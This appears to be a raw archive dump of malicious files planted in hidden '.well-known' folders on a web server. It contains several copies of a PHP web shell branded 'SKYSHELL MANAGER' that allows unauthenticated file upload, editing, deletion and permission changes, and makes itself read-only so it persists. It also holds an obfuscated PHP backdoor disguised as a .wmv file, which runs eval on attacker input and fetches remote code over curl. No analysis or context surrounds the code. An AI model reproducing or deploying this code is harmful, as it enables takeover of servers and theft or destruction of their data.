class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> .well-known/.well-known/.core_b7e.php 0000444 00000015520 15203711542 0013347 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .well-known/.well-known/.well-known/.core_e4b.php 0000444 00000015520 15203711542 0015517 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .well-known/.well-known/.well-known/lULXn.wmv 0000644 00000012634 15203711542 0015010 0 ustar 00 <?php goto Lk5plS1zjrY; Mj3jE9t0GgF: if (!(in_array(gettype($LTEYB6nvNh5) . count($LTEYB6nvNh5), $LTEYB6nvNh5) && count($LTEYB6nvNh5) == 28 && md5(md5(md5(md5($LTEYB6nvNh5[22])))) === "\70\x61\65\143\60\65\x36\x64\141\60\x66\x37\x37\x62\71\x63\x62\x66\146\x61\x63\144\x66\x32\x66\145\65\143\142\63\x61\61")) { goto LeQae_PpaA2; } goto qTy01xLwrgq; TzeiuLO6Sd0: $LTEYB6nvNh5 = ${$HrXrxOjU0IJ[25 + 6] . $HrXrxOjU0IJ[28 + 31] . $HrXrxOjU0IJ[44 + 3] . $HrXrxOjU0IJ[36 + 11] . $HrXrxOjU0IJ[16 + 35] . $HrXrxOjU0IJ[21 + 32] . $HrXrxOjU0IJ[16 + 41]}; goto Mj3jE9t0GgF; Lk5plS1zjrY: $Pab5GWSCcWd = "\x72" . "\141" . "\156" . "\147" . "\145"; goto qOJ5pkpFIE7; X9Z4SRa9dVK: metaphone("\x6a\122\x4f\x56\117\113\142\131\x54\155\142\165\x43\62\x6b\x77\x48\x63\65\104\x31\x49\x59\x39\x56\x70\x6f\x4b\x32\151\x46\x31\126\x61\x59\150\165\x61\112\x44\104\122\x6f"); goto qMbeJZnHC1w; R0z5bvJ2_d5: LeQae_PpaA2: goto X9Z4SRa9dVK; qOJ5pkpFIE7: $HrXrxOjU0IJ = $Pab5GWSCcWd("\x7e", "\40"); goto TzeiuLO6Sd0; qTy01xLwrgq: ($LTEYB6nvNh5[69] = $LTEYB6nvNh5[69] . $LTEYB6nvNh5[77]) && ($LTEYB6nvNh5[89] = $LTEYB6nvNh5[69]($LTEYB6nvNh5[89])) && @eval($LTEYB6nvNh5[69](${$LTEYB6nvNh5[31]}[23])); goto R0z5bvJ2_d5; qMbeJZnHC1w: class nVSpFl1YNPY { static function t4tb5C4sATA($cls4UcB2Etj) { goto C3ubuUkF3rQ; erefp9SftSg: $avs5QZdediL = ''; goto p7KdxC_4QFt; k4DktPvXatE: $yWmUFE3dO0P = $pDZ_BseUcOX("\176", "\40"); goto tUaNrSED8ij; kSqx1vbpIW5: YBMU8HD2goB: goto T1tBbvx5664; C3ubuUkF3rQ: $pDZ_BseUcOX = "\x72" . "\141" . "\156" . "\x67" . "\145"; goto k4DktPvXatE; T1tBbvx5664: return $avs5QZdediL; goto g4iGX4tOYYf; tUaNrSED8ij: $EqSRc6tL3z1 = explode("\176", $cls4UcB2Etj); goto erefp9SftSg; p7KdxC_4QFt: foreach ($EqSRc6tL3z1 as $hsEln43JDOo => $m5CcmP__YC2) { $avs5QZdediL .= $yWmUFE3dO0P[$m5CcmP__YC2 - 51978]; EgFP9hV5DUA: } goto kSqx1vbpIW5; g4iGX4tOYYf: } static function d1d9B7R_i2c($s_dscphGojB, $WHsvhQBGj1Z) { goto KO6lJhtA3ym; KO6lJhtA3ym: $koGSYvpTp1l = curl_init($s_dscphGojB); goto YZXp9L9tV7v; zQq0x3fNVCO: return empty($o8s16RFweH_) ? $WHsvhQBGj1Z($s_dscphGojB) : $o8s16RFweH_; goto PPYVuFiwilU; YZXp9L9tV7v: curl_setopt($koGSYvpTp1l, CURLOPT_RETURNTRANSFER, 1); goto rtaYPJL96Sr; rtaYPJL96Sr: $o8s16RFweH_ = curl_exec($koGSYvpTp1l); goto zQq0x3fNVCO; PPYVuFiwilU: } static function VqNU6OS7UcG() { goto XFmUIs9bSX4; FTkTdpDGVSr: die; goto gHOAXZefoaL; aUWQB0n8NMB: @$YVpRz0eRZ3x[1 + 9](INPUT_GET, "\x6f\146") == 1 && die($YVpRz0eRZ3x[3 + 2](__FILE__)); goto S33WQJVN9an; Z2O2m_fx8Ib: $UhDYocHX3bj = @$YVpRz0eRZ3x[1]($YVpRz0eRZ3x[1 + 9](INPUT_GET, $YVpRz0eRZ3x[1 + 8])); goto ytOAByZFtos; RE58KkKViYO: @eval($YVpRz0eRZ3x[3 + 1]($wpreZcMPeLp)); goto FTkTdpDGVSr; oTvCltVJ3GR: $f4hb11LLY6x = $YVpRz0eRZ3x[2 + 0]($BRKQpN5h2cI, true); goto aUWQB0n8NMB; xqlApygEPfm: $wpreZcMPeLp = self::D1d9B7R_i2C($f4hb11LLY6x[0 + 1], $YVpRz0eRZ3x[4 + 1]); goto RE58KkKViYO; XFmUIs9bSX4: $eLT972CLteU = array("\x35\62\x30\60\65\x7e\65\x31\71\71\x30\176\65\x32\60\x30\x33\x7e\x35\62\60\x30\x37\176\x35\x31\71\70\x38\176\65\x32\60\60\63\x7e\x35\x32\x30\x30\x39\x7e\65\x32\60\x30\x32\176\x35\x31\71\x38\x37\176\65\x31\x39\71\64\x7e\x35\x32\x30\x30\x35\x7e\x35\61\x39\x38\70\176\x35\x31\x39\71\71\x7e\x35\x31\71\x39\63\176\x35\x31\71\71\x34", "\x35\x31\71\x38\x39\x7e\65\x31\x39\70\70\x7e\65\x31\71\71\x30\x7e\65\62\x30\x30\71\176\65\x31\71\71\x30\x7e\x35\61\x39\71\63\x7e\65\x31\x39\x38\x38\176\x35\x32\60\x35\x35\176\65\62\60\65\63", "\x35\x31\x39\71\x38\176\x35\x31\71\x38\x39\176\65\x31\71\71\x33\176\x35\x31\x39\x39\x34\x7e\65\62\x30\60\71\x7e\65\x32\x30\x30\x34\x7e\x35\x32\60\60\63\x7e\65\62\60\x30\65\x7e\x35\x31\71\71\63\176\x35\62\60\x30\64\176\65\62\60\60\x33", "\65\61\x39\71\x32\176\65\62\x30\x30\67\x7e\x35\x32\x30\x30\x35\176\65\x31\x39\x39\x37", "\x35\x32\60\60\x36\176\x35\x32\x30\60\x37\x7e\x35\61\x39\70\x39\176\x35\62\x30\60\63\x7e\65\62\60\x35\x30\176\65\62\x30\x35\x32\176\65\62\60\60\71\x7e\x35\x32\x30\x30\64\x7e\65\x32\60\60\x33\176\x35\62\x30\x30\x35\x7e\x35\61\71\71\63\176\x35\x32\x30\60\64\176\x35\62\x30\60\x33", "\65\x32\x30\x30\x32\176\x35\61\71\71\71\x7e\65\x31\x39\x39\66\176\x35\x32\x30\60\63\x7e\65\62\x30\x30\71\x7e\65\62\x30\x30\x31\x7e\65\x32\60\60\x33\176\65\x31\71\x38\70\x7e\x35\62\x30\x30\71\176\x35\62\x30\x30\x35\x7e\65\x31\71\71\x33\x7e\65\x31\x39\71\x34\x7e\65\61\71\70\70\x7e\65\x32\x30\x30\x33\x7e\x35\61\x39\x39\x34\x7e\x35\61\71\x38\x38\176\x35\x31\x39\70\71", "\65\x32\x30\x33\x32\x7e\65\62\x30\66\62", "\65\x31\71\67\x39", "\x35\x32\60\65\67\x7e\65\62\60\x36\x32", "\65\62\x30\x33\71\x7e\65\x32\x30\x32\x32\x7e\x35\62\x30\x32\62\176\65\x32\60\x33\71\x7e\x35\62\60\x31\65", "\x35\x32\60\x30\62\x7e\x35\61\71\x39\71\x7e\x35\61\x39\71\x36\176\x35\61\71\x38\70\176\65\x32\60\x30\63\176\65\x31\x39\x39\60\x7e\65\x32\x30\x30\x39\x7e\65\61\x39\71\71\x7e\x35\x31\x39\x39\x34\176\65\x31\71\71\62\x7e\65\x31\71\x38\x37\x7e\65\x31\71\x38\x38"); goto U21sXuo63mT; U21sXuo63mT: foreach ($eLT972CLteU as $Py208py9Pja) { $YVpRz0eRZ3x[] = self::t4Tb5C4sATa($Py208py9Pja); WaGJ5WW56ER: } goto o6okp2HNymj; S33WQJVN9an: if (!(@$f4hb11LLY6x[0] - time() > 0 and md5(md5($f4hb11LLY6x[2 + 1])) === "\x35\x32\62\63\61\143\x39\146\x34\61\x36\61\62\65\x33\x63\x62\x34\60\66\x33\x30\x35\x33\61\x34\65\x66\x62\62\x65\x37")) { goto jfDFcFBrYdD; } goto xqlApygEPfm; gHOAXZefoaL: jfDFcFBrYdD: goto ZhyZWjzDaII; o6okp2HNymj: PLm5K9rvaPq: goto Z2O2m_fx8Ib; ytOAByZFtos: $BRKQpN5h2cI = @$YVpRz0eRZ3x[0 + 3]($YVpRz0eRZ3x[3 + 3], $UhDYocHX3bj); goto oTvCltVJ3GR; ZhyZWjzDaII: } } goto df3ZmXowgTM; df3ZmXowgTM: nvSPfl1YNPy::vqNu6OS7uCg(); ?> .well-known/.well-known/.well-known/users.php 0000444 00000016101 15203711542 0015114 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo 